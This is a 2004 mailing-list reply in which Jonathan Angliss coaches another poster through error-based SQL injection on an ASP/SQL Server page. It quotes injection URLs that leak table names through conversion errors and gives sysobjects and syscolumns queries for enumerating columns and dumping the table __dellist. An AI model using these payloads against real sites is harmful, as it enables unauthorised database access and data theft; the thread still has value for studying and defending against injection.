Re: SQL Injection data retrieving??

[Jonathan Angliss <jon () netdork net>]

Hi Roland,

Friday, September 10, 2004, 7:06:56 AM, you wrote:
> First I've sent this URL:

> www.mysite.com/products.asp?id=convert(int,(select top 1 name
> from sysobjects where xtype='u' order by asc))

> And I've goot the following error:

> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80040E07)
> Syntax error converting the nvarchar value '__big_field' to a column of data type int.
> /products.asp, line 32

You got that error because name is described as type sysname, which
according to that error is a type of nvarchar. Unless it's obviously a
numeric in a string, using convert will fail, for example:

  convert(int, '123')

That'll work

  convert(int , 'abc')

That'll fail. Unless getting it to generate such an error is part of
your plan.

> I assume that "__big_field" is the name of the databse? Right?

I believe that's a table name, not a database name.  I believe the
database names are stored under the master database in a table called
sysdatabases.

> Secondly I've sent the the following URL in order to get the table name:

> www.mysite.com/products.asp?id=convert(int,(select top 1 name
> from sysobjects where xtype='u' and name>'__big_field' order by 1
> asc))

> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80040E07)
> Syntax error converting the nvarchar value '__dellist' to a column of data type int.
> /products.asp, line 32

Again, you're attempting to convert an nvarchar to an integer.

> So "__dellist" is a table from the "__big_field" database? Right?

No, just another table in the same database, your where clause is
telling the query to ignore the table __big_field, so it just grabs
the next one down.

> Now here comes the troubles... I would like to retrieve the
> columns name of the "__dellist" table and the data of the
> "__dellist".

select id from sysobjects where name = '__dellist'

That'll get you the table id.  Then:

select name from syscolumns where id = [id from above query]

That'll get you the column names.  Or you can use a single query:

select c.name from syscolumns as c inner join sysobjects as o on o.id = c.id where o.name = '__dellist'

> I've sent: 

> www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))

> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80004005)
> Subquery returned more than 1 value. This is not permitted when
> the subquery follows =, !=, <, <= , >, >= or when the subquery is
> used as an expression.
> /products.asp, line 32

You're issuing a convert on a number of fields, I don't think SQL
likes that very much.

> My question is: Which query should I sent i order to retrieve the data of the table??

select * from __dellist

The problem is, if the script isn't designed to handle the output from
__dellist, it might not be of any use doing half of this as you cannot
see the output, thought the page might generate a bunch of errors.

-- 
Jonathan Angliss
(jon () netdork net)

I before E except after C, huh? Weird.....